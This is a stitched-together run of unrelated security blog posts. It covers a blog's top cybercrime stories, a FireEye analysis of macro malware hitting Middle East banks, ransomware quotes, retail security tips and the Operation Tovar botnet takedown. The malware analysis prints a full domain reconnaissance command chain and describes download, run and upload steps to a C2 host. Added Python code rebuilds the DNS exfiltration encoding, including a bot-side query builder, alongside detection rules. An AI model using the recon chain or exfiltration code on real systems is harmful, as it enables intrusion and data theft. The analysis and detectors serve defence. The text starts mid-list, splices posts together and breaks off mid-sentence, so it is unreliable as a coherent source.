    2. Coming much later, November 7, 2014, was "Warrant for your Arrest phone scams." It was great to see the heavy traffic to that blog post and receive the emails letting me know that someone had just "proven" to them that they were about to be scammed by sending them a link to the article!

    3. During 2014 one of the largest spamming botnets was the ASProx botnet.   This malware blasted out high volume spam campaigns that used a variety of social engineering ploys to make their campaigns convincing, leading to huge victimization rates.   The most popular, based on hits to the blog, was the E-Z Pass Spam.  "E-Z Pass Spam Leads to Location Aware Malware" (July 8, 2014) had tens of thousands of visitors.  A close second, also ASProx, was "Urgent Court Notice from GreenWinick Lawyers delivers malware."   ASProx had been dominant from the holiday season in 2013, when "package delivery failure" messages really hit a profound number of victims.  (See for example "Holiday Delivery Failures Deliver Kuluoz Malware" (December 26, 2013).)

    Rather than go through the top campaigns in order, I thought it might be more interesting to see the most popular posts for each of our ten years as a blog.

    Top Cybercrime & Doing Time Blog Posts of 2016
    Vovnenko / Fly / MUXACC1 pleads guilty (24JAN2016)
    Kelihos botnet delivering Dutch WildFire Ransomware (09JUL2016)
    Is the Bank of Bangladesh ready for the Global Economy? (23APR2016)
    Unlimited ATM Mastermind Ercan Findikoglu pleads guilty (06MAR2016)

    In 2016, two of our four top stories were about arrests of top cybercriminals, which is a trend that I love to say is growing and rising as we see a higher level of cooperation internationally, and a growing ability among our Law Enforcement partners. One of the highest volume spam botnets, Kelihos, is regularly in our blogs and is quite popular with the readers, indicating how often they also see the spam. The Bank of Bangladesh SWIFT theft was also a high interest story!

    Top Cybercrime & Doing Time Blog Posts of 2015
    Tech Support "pop-ups" (30MAR2015)
    Hillary's Email Server and the New York City malware (03OCT2015)
    Passwords, Password Cracking, and Pass Phrases (29OCT2015)
    Darkode guilty pleas: Phastman, Loki, & Strife (24AUG2015)

    In 2015, the Darkode forum was a top story for us. Readers responded well to the Tech Support "pop-up" scams, indicating that they were also seeing it quite a bit! Hillary's email server gave us a chance to show the value of a long-term spam repository. And the story on password cracking seems to be regularly accessed from people teaching others about strong passwords.

    Top Cybercrime & Doing Time Blog Posts of 2014
    Warrant for Your Arrest phone scams (07NOV2014)
    E-ZPass Spam leads to Location Aware Malware (08JUL2014)
    Urgent Court Notice from GreenWinick Lawyers delivers malware (13JUL2014)
    GameOver Zeus now uses Encryption to bypass Perimeter Security (02FEB2014)

    The phone scams claiming that a warrant has been issued for your arrest have been popular on a daily basis for most of the two years since this story was first released. EZ Pass and Urgent Court Notice spoke to the popularity of the ASProx botnet. Gameover Zeus was also quite interesting as it changed the way spam-delivered malware defeated perimeter security.

    Top Cybercrime & Doing Time Blog Posts of 2013
    Holiday Delivery Failures lead to Kuluoz malware (26DEC2013)
    Vietnamese Carders arrested in case (05JUN2013)
    When Parked Domains Still Infect - and ZeroPark (10AUG2013)
    New Spam Attack accounts for 62% of our spam! (10APR2013)

    Kuluoz, later called ASProx, had its first big Christmas in 2013. One of the first arrests of Vietnamese hackers spoke to international cooperation.

    Top Cybercrime & Doing Time Blog Posts of 2012
    Operation Open Market: The Vendors (25MAR2012)
    Paypal "You Just Sent a Payment" spam leads to malware (01MAY2012)
    DNS Changer: Countdown clock reset, but still ticking (28MAR2012)
    Operation Open Market: Jonathan Vergnetti (17MAR2012)

    In 2012, the DNS Changer malware was on everyone's minds (we later blogged about the successful prosecution of the leaders of that campaign, all now in prison in New York.) Operation Open Market was the big Forum take-down that year.

    Top Cybercrime & Doing Time Blog Posts of 2011
    More ACH Spam from NACHA (11MAR2011)
    ACH Transaction Rejected payments lead to Zeus (25FEB2011)
    Federal Reserve Spam (14MAR2011)
    The Epsilon Phishing Model (08APR2011)

    I've already mentioned the ACH/NACHA spam campaigns that delivered Zeus. The Epsilon Phishing model focused on hacking email delivery services and using validated accounts to deliver phishing and malware. (This is the group that Neil Schwartzman of CAUCE labeled "The Adobers" for the many times their malware claimed to be Adobe software.)

    Top Cybercrime & Doing Time Blog Posts of 2010
    New York FBI: 17 Wanted Zeus Criminals (30SEP2010)
    PakBugs Hackers arrested (12JUL2010)
    Lin Mun Poo: Hacker of the Federal Reserve and ...? (20NOV2010)
    Iranian Cyber Army returns - target: Baidu.com (12JAN2010)

    The Iranian Cyber Army, and a variety of international cyber criminals captured the headlines in 2010.

    Top Cybercrime & Doing Time Blog Posts of 2009
    Newest Zeus = NACHA: The Electronic Payments Association (12NOV2009)
    The FBI's Biggest Domestic Phishing Bust Ever (08OCT2009)
    Who is the "Iranian Cyber Army"? Twitter DNS Redirect (18DEC2009)
    Traveler Scams: Email Phishers Newest Scam (09FEB2009)

    Our 2009 "Traveler Scams" post was for years the most successful post on the blog, as many people shared the post with their friends to warn about the scam. NACHA was just becoming the leading scam-victim related to Zeus, and the FBI celebrated a huge phishing victory!

    Top Cybercrime & Doing Time Blog Posts of 2008
    The UAB Spam Data Mine: Looking at Malware Sites (09AUG2008)
    Anti-Virus Products Still Fail on Fresh Viruses (12AUG2008)
    ICE: Operation Predator - Solving Intertwined Child Porn cases (05NOV2008)
    Bank of America Demo Account - DO NOT CLICK (26NOV2008)

    In 2008, we were just getting seriously up to speed with the UAB Spam Data Mine, and found many interesting malware campaigns using these techniques, which eventually led to the creation of Malcovery Security, later acquired by PhishMe.

    Top Cybercrime & Doing Time Blog Posts of 2007
    Is Your Fifth Grader Smarter Than a Laughing Cat? (15OCT2007)
    Google Referrer Only malware sites (13DEC2007)
    AffPower Indictments Scare Affiliates! (06AUG2007)
    TJX: From Florida to the Ukraine? (04SEP2007)

    In 2007, the Storm Worm was one of the top spreaders of malware. The Laughing Cat story pointed out that if you share your computer with younger family members, they may very well click on lures that any educated adult would reject. The AffPower case remains one of my favorite law enforcement actions against online pharmaceutical affiliate programs. The TJX story tracked some of the carders involved in the TJX data breach.

    Top Cybercrime & Doing Time Blog Posts of 2006
    Pump & Dump: SEC gives us a peek! (21DEC2006)
    Counterfeit Checks? Who cares! (12OCT2006)
    Birmingham InfraGard - October 2006 (10OCT2006)
    FAL$E HOPE$ @ CHRI$TMA$ (22DEC2006)

    In 2006, our inaugural year, we didn't have a lot of stories, honestly. Pump & Dump spam was interesting that year, and we blogged about some of the holiday scams we were seeing.

    Unfortunately, several of the graphics in the older stories are unavailable due to changes in hosting. Hopefully we'll get those recovered eventually. Sorry for any loss of enjoyment that may cause while strolling down Cybercrime Memory Lane with me!

    Looking forward to another Ten Years informing the public about Cybercrime & Doing Time!

    Thanks to all of my friends and students who encouraged this blog along the way, and helped through their dedication to fighting Cybercrime and sharing in the analysis we did together. While there have been tons of great contributors in the lab, with regards to things that ended up in the blog I'd like to especially thank: Heather McCalley, Matthew Grant, Chun Wei, Brad Wardman, Brian Tanner, Tommy Stallings, Sarah Turner, Josh Larkins, Jui Sonwalker, JohnHenri Ewerth, Brendan Griffin, and Kyle Jones.

    Thanks also to my inspirations in blogging, Brian Krebs, and Graham Cluley. This amateur blogger is truly grateful for what you guys do and share!

    Targeted Attacks against Banks in the Middle East

    UPDATE (Dec. 8, 2017): We now attribute this campaign to APT34, a suspected Iranian cyber espionage threat group that we believe has been active since at least 2014. Learn more about APT34 and their late 2017 targeting of a government organization in the Middle East.


    In the first week of May 2016, FireEye's Dynamic Threat Intelligence (DTI) identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region. The threat actors appear to be performing initial reconnaissance against would-be targets, and the attacks caught our attention because they used unique scripts not commonly seen in crimeware campaigns.

    In this blog we discuss in detail the tools, tactics, techniques and procedures (TTPs) used in these targeted attacks.

    Delivery Method

    The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East. The themes of the messages used in the attacks relate to IT infrastructure, such as a Server Status Report log or a list of Cisco IronPort appliance details. In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks. This email was then forwarded to several people, with the malicious Excel file attached.

    Macro Details

    The macro first calls an Init() function (shown in Figure 1) that performs the following malicious activities:

    1. Extracts base64-encoded content from the cells within a worksheet titled "Incompatible".
    2. Checks for the presence of a file at the path %PUBLIC%\Libraries\update.vbs. If the file is not present, the macro creates three directories under %PUBLIC%\Libraries, namely up, dn and tp.
    3. The extracted content from step one is decoded using PowerShell and dropped into two different files: %PUBLIC%\Libraries\update.vbs and %PUBLIC%\Libraries\dns.ps1
    4. The macro then creates a scheduled task with name: GoogleUpdateTaskMachineUI, which executes update.vbs every three minutes.

    Note: Due to the use of a hardcoded environment variable %PUBLIC% in the macro code, the macro will only run successfully on Windows Vista and subsequent versions of the operating system.

    Figure 1: Macro Init() subroutine

    Run-time Unhiding of Content

    One of the interesting techniques we observed in this attack was the display of additional content after the macro executed successfully. This was done for the purpose of social engineering – specifically, to convince the victim that enabling the macro did in fact result in the “unhiding” of additional spreadsheet data.

    Office documents containing malicious macros are commonly used in crimeware campaigns. Because default Office settings typically require user action in order for macros to run, attackers may convince victims to enable risky macro code by telling them that the macro is required to view “protected content.”

    In crimeware campaigns, we usually observe that no additional content is displayed after enabling the macros. However, in this case, attackers took the extra step to actually hide and unhide worksheets when the macro is enabled to allay any suspicion. A screenshot of the worksheet before and after running the macro is shown in Figure 2 and Figure 3, respectively.

    Figure 2: Before unhiding of content

    Figure 3: After unhiding of content

    In the following code section, we can see that the subroutine ShowHideSheets() is called after the Init() subroutine executes completely:

    Private Sub Workbook_Open()
        Call Init              ' drop update.vbs and dns.ps1, register the scheduled task
        Call ShowHideSheets    ' only then unhide the decoy worksheet content
    End Sub

    The code of subroutine ShowHideSheets(), which unhides the content after completion of malicious activities, is shown in Figure 4.

    Figure 4: Macro used to unhide content at runtime

    First Stage Download

    After the macro successfully creates the scheduled task, the dropped VBScript, update.vbs (Figure 5), will be launched every three minutes. This VBScript performs the following operations:

    1. Leverages PowerShell to download content from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\dwn&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
    2. Uses PowerShell to download a BAT file from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\bat&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
    3. Executes the BAT file and stores the results in a file in the path %PUBLIC%\Libraries\up.
    4. Uploads this file to the server by sending an HTTP POST request to the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\upl&m=u.
    5. Finally, it executes the PowerShell script dns.ps1, which is used for the purpose of data exfiltration using DNS.

    Figure 5: Content of update.vbs

    During our analysis, the VBScript downloaded a customized version of Mimikatz in the previously mentioned step one. The customized version uses its own default prompt string as well as its own console title, as shown in Figure 6.

    Figure 6: Custom version of Mimikatz used to extract user password hashes

    Similarly, the contents of the BAT file downloaded in step two are shown in Figure 7:

    whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1

    Figure 7: Content of downloaded BAT script

    This BAT file is used to collect important information from the system, including the currently logged on user, the hostname, network configuration data, user and group accounts, local and domain administrator accounts, running processes, and other data.
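    The persistence artefacts left by the macro (the GoogleUpdateTaskMachineUI task that runs update.vbs out of %PUBLIC%\Libraries) and the one-line reconnaissance chain above are both cheap to hunt for in process-creation telemetry. The Python below is an added example written for this page, not FireEye's code and not part of the original post: it runs two rules over a handful of constructed Sysmon-style process events. The sample events, the alert threshold of four distinct discovery commands in one command line, and the record field names are all assumptions of the example. The real Google Update tasks are named GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA, which is what makes the "UI" lookalike worth a rule of its own.

```python
import re

# Constructed sample process-creation records (not from the original post).
# Fields mimic what Sysmon event 1 or an EDR would give you: an id, the image, the command line.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 3 /tn GoogleUpdateTaskMachineUI /tr "wscript.exe C:\Users\Public\Libraries\update.vbs"'},
    {"id": 2, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group "domain admins" /domain 2>&1 & netstat -an 2>&1'},
    {"id": 3, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn NightlyBackup /tr "C:\Tools\backup.exe"'},
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c ipconfig /all"},
]

# One pattern per discovery command that appears in the downloaded BAT file.
RECON_PATTERNS = {
    "whoami":         re.compile(r"\bwhoami\b", re.I),
    "hostname":       re.compile(r"\bhostname\b", re.I),
    "ipconfig":       re.compile(r"\bipconfig\s+/all\b", re.I),
    "net user":       re.compile(r"\bnet\s+user\b", re.I),
    "net group":      re.compile(r"\bnet\s+group\b", re.I),
    "net accounts":   re.compile(r"\bnet\s+accounts\b", re.I),
    "net localgroup": re.compile(r"\bnet\s+localgroup\b", re.I),
    "netstat":        re.compile(r"\bnetstat\b", re.I),
    "tasklist":       re.compile(r"\btasklist\b", re.I),
    "sc query":       re.compile(r"\bsc\s+query\b", re.I),
    "systeminfo":     re.compile(r"\bsysteminfo\b", re.I),
    "reg query TS client": re.compile(r"\breg\s+query\b.*Terminal Server Client", re.I),
}
RECON_THRESHOLD = 4  # assumed: this many distinct discovery commands in one command line is worth an alert

# Persistence artefacts from the macro: the lookalike task name and the drop directory it uses.
TASK_NAME_RE = re.compile(r'/tn\s+"?GoogleUpdateTaskMachineUI\b', re.I)
DROP_DIR_RE = re.compile(r"(%PUBLIC%|\\Users\\Public)\\Libraries\\", re.I)


def recon_commands(cmdline):
    """Return the set of discovery commands present in one command line."""
    return {name for name, rx in RECON_PATTERNS.items() if rx.search(cmdline)}


def suspicious_task(cmdline):
    """True for a 'schtasks /create' that uses the lookalike task name or runs a payload from the drop directory."""
    if "/create" not in cmdline.lower():
        return False
    return bool(TASK_NAME_RE.search(cmdline) or DROP_DIR_RE.search(cmdline))


def triage(events):
    """Run both rules over the events; return [(event id, reason)] for every hit."""
    hits = []
    for ev in events:
        cl = ev["cmdline"]
        if ev["image"].lower().endswith("schtasks.exe") and suspicious_task(cl):
            hits.append((ev["id"], "persistence: scheduled task with lookalike name or %PUBLIC%\\Libraries payload"))
        found = recon_commands(cl)
        if len(found) >= RECON_THRESHOLD:
            hits.append((ev["id"], "recon: %d discovery commands chained: %s" % (len(found), ", ".join(sorted(found)))))
    return hits


if __name__ == "__main__":
    for eid, reason in triage(SAMPLE_EVENTS):
        print(eid, reason)
```

    Event 4 (a lone ipconfig) stays below the threshold on purpose: a single discovery command is normal administrator activity, and it is the chaining of many of them in one process that characterises the BAT file here. Tune the threshold to your own baseline before deploying anything like this.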

    Data Exfiltration over DNS

    Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel. This was likely done because DNS is required for normal network operations. The DNS protocol is unlikely to be blocked (allowing free communications out of the network) and its use is unlikely to raise suspicion among network defenders.

    The script dns.ps1, dropped by the macro, is used for this purpose. In the following section, we describe its functionality in detail.

    1. The script requests an ID (through the DNS protocol) from go0gIe[.]com. This ID will then be saved into the PowerShell script.
    2. Next, the script queries the C2 server for additional instructions. If no further actions are requested, the script exits and will be activated again the next time update.vbs is called.
    3. If an action is required, the DNS server replies with an IP with the pattern 33.33.xx.yy. The script then proceeds to create a file at %PUBLIC%\Libraries\tp\chr(xx)chr(yy).bat. The script then proceeds to make DNS requests to fetch more data. Each DNS request results in the C2 server returning an IP address. Each octet of the IP address is interpreted as the decimal representation of an ASCII character; for example, the decimal number 99 is equivalent to the ASCII character ‘c’. The characters represented by the octets of the IP address are appended to the batch file to construct a script. The C2 server signals the end of the data stream by replying to a DNS query with the IP address
    4. Once the file has been successfully transferred, the BAT file will be run and its output saved as %PUBLIC%\Libraries\tp\chr(xx)chr(yy).txt.
    5. The text file containing the results of the BAT script will then be uploaded to the DNS server by embedding file data into part of the subdomain. The format of the DNS query used is shown in Table 1.
    6. The BAT file and the text file will then be deleted. The script then quits, to be invoked again upon running the next scheduled task.

    The DNS communication portion of the script is shown in Figure 8, along with a table showing the various subdomain formats being generated by the script.

    Figure 8: Code Snippet of dns.ps1

    Table 1: C2 Protocol Format (subdomains used in the DNS C2 protocol)

    Purpose (step in the list above)      Subdomain format
    Request for BotID (step 2)            [00][botid]00000[base36 random number]30
    File transfer (step 3)                [00][botid]00000[base36 random number]232A[hex_filename][i-counter]
    File upload (step 5)                  [00][botid][cmdid][partid][base36 random number][48-hex-char-of-file-content]
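    The two DNS channels described in steps 3 and 5 and in Table 1 are easy to replay offline. The Python below is an added example written for this page, not FireEye's code and not the actual dns.ps1: decode_download replays a sequence of A-record answers into the batch file they carry (33.33.xx.yy naming the file, then four ASCII bytes per answer), and extract_upload pulls the 48-hex-character payload out of each query under the C2 domain and reassembles the exfiltrated output. Everything not stated in the post is an assumption of the example: the end-of-stream address (the post's text is truncated there, so END_MARKER is a placeholder, not the real value), the widths of the cmdid, partid and random fields used to build sample queries, reassembly in arrival order rather than by partid, and the sample traffic itself, which is constructed rather than captured.

```python
import re
from typing import Iterable, List, Tuple

# The post's C2 domain (a typosquat of google.com), case-folded; DNS names are case-insensitive.
C2_DOMAIN = "go0gie.com"

# --- Download channel: a batch file delivered one IPv4 answer (four bytes) at a time ---------
FILE_PREFIX = (33, 33)  # the first answer 33.33.xx.yy names the file chr(xx)chr(yy).bat
# Placeholder only: the post does not say which address the C2 uses as the end-of-stream marker.
END_MARKER = "0.0.0.0"


def octets(ip: str) -> Tuple[int, ...]:
    """Parse a dotted-quad answer into its four octets, rejecting anything that is not IPv4."""
    parts = tuple(int(p) for p in ip.split("."))
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError("not an IPv4 address: %r" % ip)
    return parts


def decode_download(answers: Iterable[str]) -> Tuple[str, str]:
    """Replay the C2's A-record answers in order; return (batch filename, batch script text)."""
    it = iter(answers)
    first = octets(next(it))
    if first[:2] != FILE_PREFIX:
        raise ValueError("expected 33.33.xx.yy as the first answer, got %s" % (first,))
    filename = chr(first[2]) + chr(first[3]) + ".bat"
    chunks: List[str] = []
    for ip in it:
        if ip == END_MARKER:
            break
        chunks.append("".join(chr(o) for o in octets(ip)))  # each octet is one ASCII character
    else:
        raise ValueError("answer stream ended without the end marker")
    return filename, "".join(chunks)


# --- Upload channel: command output carried in the query name, 24 bytes (48 hex chars) per query ---
HEX_TAIL = re.compile(r"([0-9a-f]{48})$")


def build_upload_queries(botid: str, cmdid: int, content: bytes, rnd: str = "k7q2") -> List[str]:
    """Bot side, used here only to generate test traffic. The 2-digit cmdid, 3-digit partid and
    4-char base36 'random' field are widths assumed for this example; the post gives only the order."""
    queries = []
    for part_no, i in enumerate(range(0, len(content), 24)):
        label = "00%s%02d%03d%s%s" % (botid, cmdid, part_no, rnd, content[i:i + 24].hex())
        queries.append("%s.%s" % (label, C2_DOMAIN))
    return queries


def extract_upload(queries: Iterable[str]) -> bytes:
    """Defender side: keep queries under the C2 domain whose name ends in 48 hex chars, decode that
    tail and reassemble in arrival order (assumed to equal partid order). A final part shorter than
    24 bytes is not described in the post and is not handled here."""
    out = bytearray()
    suffix = "." + C2_DOMAIN
    for name in queries:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        m = HEX_TAIL.search(name[: -len(suffix)])
        if m:
            out += bytes.fromhex(m.group(1))
    return bytes(out)


# --- Constructed sample traffic (not captured data) -----------------------------------------
SAMPLE_ANSWERS = [
    "33.33.97.98",      # -> ab.bat
    "110.101.116.32",   # "net "
    "117.115.101.114",  # "user"
    "32.47.100.111",    # " /do"
    "109.97.105.110",   # "main"
    END_MARKER,
]
SAMPLE_OUTPUT = b"User accounts for \\\\DC01" + b"Administrator  Guest    "  # 48 bytes -> 2 parts
SAMPLE_QUERIES = (
    ["00a1b200000k7q230." + C2_DOMAIN, "www.example.com."]  # BotID request (no payload) plus benign noise
    + build_upload_queries("a1b2", 1, SAMPLE_OUTPUT)
)

if __name__ == "__main__":
    print(decode_download(SAMPLE_ANSWERS))
    print(extract_upload(SAMPLE_QUERIES))
```

    Run it as a script to see the recovered batch file and the reassembled upload. On the defender side the only strong signal is the structure of the query name, so the same 48-hex-character tail under one domain is what a DNS log search for this family would key on; the BotID request in the sample traffic is deliberately left unmatched to show that the rule is selective.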


    Although this attack did not leverage any zero-days or other advanced techniques, it was interesting to see how attackers used different components to perform reconnaissance activities on a specific target.

    This attack also demonstrates that macro malware is still effective today. Users can protect themselves from such attacks by disabling Office macros in their settings and by being more vigilant when prompted to enable macros in documents, even when those documents come from seemingly trusted sources. In managed environments, blocking macros in documents downloaded from the internet by policy takes that decision out of the user's hands altogether.

    “Ransomware threat highlighted by Los Angeles hospital payout”

    Team Cymru has three quotes in New Scientist. Big thanks to Sam Wong who wrote the piece!

    “Ransomware has really exploded in the last couple of years,” says Steve Santorelli, a former UK police detective who now works for Team Cymru, a threat intelligence firm based in Florida. One ransomware package, CryptoLocker 3.0, is thought to have earned attackers $325 million in 2015 alone.

    This is not to say the criminals can’t be tracked down. “Good cybercrime investigation is about turning over thousands of little rocks looking for the mistakes that the criminals have made,” says Santorelli. “And they always make mistakes.”

    Many more hospitals may have been attacked by cybercriminals, but we never hear about it because they keep things under wraps. “People don’t want to rock consumer confidence, and having your medical history stolen is pretty horrific,” says Santorelli. “This is going to be devastating to the victims.”

    Read full article here

    Photo Credit, ‘Ransom demand’ by Keith Hall, used under Creative Commons license 2.0

    Pukka Firewall Lessons from Jamie Oliver

    In our office I’m willing to bet that food is discussed on average three times a day. Monday mornings will be spent waxing lyrical about the culinary masterpiece we’ve managed to prepare over the weekend. Then at around 11 someone will say, “Where are we going for lunch?” Before going home that evening, maybe there’s a question about the latest eatery in town. 

    I expect your office chit chat is not too dissimilar to ours, because food and what we do with it has skyrocketed in popularity over the past few years. Cookery programmes like Jamie Oliver's 30 minute meals, the Great British Bake-off and Masterchef have been a big influence. 

    Our food obsession, however, might be putting us all at risk, and I don’t just mean from an expanded waistline. Cyber criminals appear to have turned their attention to the food industry, targeting Jamie Oliver’s website with malware. This is the second time that malware has been found on the site. News originally broke back in February, and the problem was thought to have been resolved. Then, following a routine site inspection on the 13th of March, webmasters found that the malware had returned, or had never actually been completely removed. 

    It’s no surprise that cyber criminals have associated themselves with Jamie Oliver, since they’ve been leeching on pop culture and celebrities for years. Back in 2008, typing a star’s name into a search engine and straying away from the official sites was a sure-fire way to get malware. Now it seems they’ve cut out the middleman, going straight to the source. This malware was planted directly onto

    Apart from bad press, Jamie Oliver has come away unscathed. Nobody has been seriously affected and the situation could have been much worse had the malware got into an organisational network. 

    Even with no real damage there’s an important lesson to be learned. Keep your firewall, and in particular its web filtering and intrusion prevention signatures, up to date so that it can identify nefarious code served from web pages or applications. If such code tries to execute on your machine, a well-maintained firewall stands a good chance of identifying it as malware; a plain packet filter on its own will not.

    3 Rules for Cyber Monday

    It’s nearly here again folks, and the clues are all there: planning the office Christmas party, your boss humming Rudolph the Red Nosed Reindeer and an armada of Amazon packages arriving.

    Which brings me nicely to the topic of this blog: online shopping at work.

    It’s official; we are ‘in love’ with online shopping. At this time of the year, it’s harder to resist temptation. Retailers conjure up special shopping events like Black Friday and Cyber Monday, all aimed at getting us to part with our hard-earned cash. While online retailers rub their hands in anticipation of December 1st, for companies without proper web security the online shopping season could turn out to be the nightmare before Christmas.

    In a recent survey by RetailMeNot, a digital coupon provider, 86 percent of working consumers admitted that they planned to spend at least some time shopping or browsing online for gifts during working hours on Cyber Monday. That equates to a whole lot of lost productivity and unnecessary pressure on your bandwidth.

    To help prevent distraction and clogged bandwidth, I know of one customer (and I’m sure there are others) who is allowing his employees time to shop from their desks in their lunch breaks. He’s a smart man: productivity stays high and employees stay happy.

    But productivity isn’t the only concern for the IT department – cyber criminals are out in force at this time of year, trying to take advantage of big hearts and open wallets with spam and phishing emails. One click on a seemingly innocent link could take your entire network down.

    To keep such bad tidings at bay, here’s a web security checklist to ensure your holiday season is filled with cheer not fear.

    1.  Flexible Filtering. Set time quotas to allow online shopping access at lunchtimes, or outside of core hours. Whatever you decide is reasonable, make sure your employees are kept in the loop about what you classify as acceptable usage and communicate this through an Acceptable Usage Policy.

    2.  Invest in Anti-malware and Anti-spam Controls. As inboxes start to fill with special offer emails, it gets more difficult to differentiate between legitimate emails and spam. These controls will go some way towards separating the wheat from the chaff.

    3.  Issue Safety Advice to Your Employees. Ask employees to check the legitimacy of a site before purchasing anything. The locked padlock symbol indicates that the purchase is encrypted and secure. In addition, brief them to be alert for phishing scams and not to open emails or click on links from unknown contacts.

    Operation Tovar: The Latest Attempt to Eliminate Key Botnets

    Coordinated botnet disruptions have increased in pace and popularity over the last few years as more private companies work with international law enforcement agencies to combat malware infections on a grand scale. Operation Tovar, announced on June 2, 2014, is the latest to make headlines. The target of the investigation, Evgeniy Mikhailovich Bogachev, was indicted by the Department of Justice and is wanted by the FBI for his role as alleged leader of the Gameover ZeuS and CryptoLocker botnets. Four other defendants were indicted under their pseudonyms. Though Bogachev’s current activities aren’t known, the Operation Tovar task force has maintained control of the botnet infrastructure and remediation efforts are ongoing.

    While new malware strains are released with increasing frequency, it’s easy to forget why Gameover and CryptoLocker are worthwhile targets for takedown operations. Both offered more advanced features than their peers and typified the increasingly sophisticated cybercriminal enterprises behind botnets.

    Gameover ZeuS

    Since the ZeuS source code was released in 2011, several new variants have appeared in the wild. Citadel, KINS, ICE IX, and Gameover have all improved upon the basic ZeuS model by introducing new features, using better encryption, and modifying command and control (C2) communication methods.

    Gameover uses a peer-to-peer (P2P) system for C2 communication. Though other P2P botnets such as Kelihos exist, Gameover is notable for its use of proxy nodes to introduce complexity into the standard P2P infrastructure. These proxy nodes are specific machines designated as relay points through which the botnet operators send commands and receive stolen information. This minimizes the number of systems that actually communicate with C2 servers. C2 commands are signed using RSA-2048 and encrypted with RC4, making it very difficult to tamper with the botnet.

    Additionally, Gameover maintains a failsafe mechanism: a domain generation algorithm (DGA) that produces 1,000 domains each week. This feature enables the operators to maintain control of their botnet even if the P2P infrastructure is compromised. The DGA produces long, nonsensical strings at one of six top-level domains (.com, .net, .org, .biz, .info and .ru) that can be registered and used to send commands to the botnet.
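    A defender-side check suggested by the description above, added here as an example and not code from the article or the Operation Tovar task force: a heuristic run over constructed DNS query log lines that flags long, high-entropy, vowel-poor names at the six listed TLDs and counts them per client, so hosts making repeated DGA-like lookups surface as remediation candidates. The log format, thresholds and every domain name in the sample are assumptions, not real Gameover output.

```python
import math
from collections import Counter

# The six top-level domains the article says the Gameover DGA draws from.
DGA_TLDS = {"com", "net", "org", "biz", "info", "ru"}

# Constructed sample DNS query log, one "<time> <client> query <name>" per line.
# The names are invented for this example and are not real DGA output.
SAMPLE_DNS_LOG = """\
2014-06-03T09:12:01Z 10.0.0.21 query www.example.com
2014-06-03T09:12:04Z 10.0.0.21 query internationalbusinessmachines.com
2014-06-03T09:12:09Z 10.0.0.37 query xkqplmzvtrwocdfjgybhnaelu.biz
2014-06-03T09:12:10Z 10.0.0.37 query qwmrtzplnxvcbdhgkfjsyaeoui.ru
2014-06-03T09:12:11Z 10.0.0.37 query bzlmkqpwtrvncxgfdhsjyeaou.info
2014-06-03T09:12:15Z 10.0.0.44 query cdn.jsdelivr.net
"""

def shannon_entropy(text):
    """Bits of entropy per character; random letter strings score near log2(26)."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def looks_like_dga(domain, min_len=16, min_entropy=3.5, max_vowel_ratio=0.3):
    """Heuristic: a long, high-entropy, vowel-poor second-level label at a listed TLD.
    The length and ratio thresholds are assumed values, not taken from the article."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2 or labels[-1] not in DGA_TLDS:
        return False
    sld = labels[-2]
    if len(sld) < min_len:
        return False
    vowels = sum(ch in "aeiou" for ch in sld)
    return shannon_entropy(sld) >= min_entropy and vowels / len(sld) <= max_vowel_ratio

def suspicious_clients(log_text, min_hits=3):
    """Clients with at least min_hits DGA-looking lookups; one odd name alone is noise."""
    hits = Counter()
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) == 4 and fields[2] == "query" and looks_like_dga(fields[3]):
            hits[fields[1]] += 1
    return {client: n for client, n in hits.items() if n >= min_hits}

if __name__ == "__main__":
    for client, n in suspicious_clients(SAMPLE_DNS_LOG).items():
        print(f"{client}: {n} DGA-like lookups, candidate for remediation")
```

    A long dictionary-word name such as the constructed internationalbusinessmachines.com is not flagged because both its entropy and its vowel ratio look like English; the per-client count keeps a single odd lookup from raising an alert.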

    ZeuS and all its variants are information-stealing trojans. We refer to them as banking trojans because that’s where they excel and Gameover is no exception. Gameover is able to trick the user into handing over personal information and can even defeat two-factor authentication. It accomplishes this by injecting custom code into the browser when a victim visits certain websites. Gameover’s arsenal of bank account takeover tools includes 1,500 web injections that were custom-made to target the websites of more than 700 financial institutions worldwide.

    In addition to its exceptional abilities as a banking trojan, Gameover is capable of a wider variety of data theft activities. An Operation Tovar task force member, speaking to Brian Krebs on the condition of anonymity, said they have evidence of additional harvested data and that Gameover targeted proprietary information.


    Not content with merely engaging in widespread banking credential and information theft, the Gameover criminal operators decided to maximize returns by infecting systems with CryptoLocker. It is a type of ransomware that encrypts the files on infected machines and then demands a ransom of hundreds of dollars in order to receive a decryption key. Typically, victims were given 72 hours to pay the ransom in bitcoins or risk losing their data.

    Unwilling to miss out on any opportunity to generate revenue, the criminal operators set up a website to assist victims in paying the ransom in bitcoins. Through this website, victims could complete the transaction and track the status of their “order” – the ransom payment in exchange for the decryption key. Some victims, unwilling or unable to pay the ransom, missed the 72-hour deadline only to see the ransom demand increase fivefold.

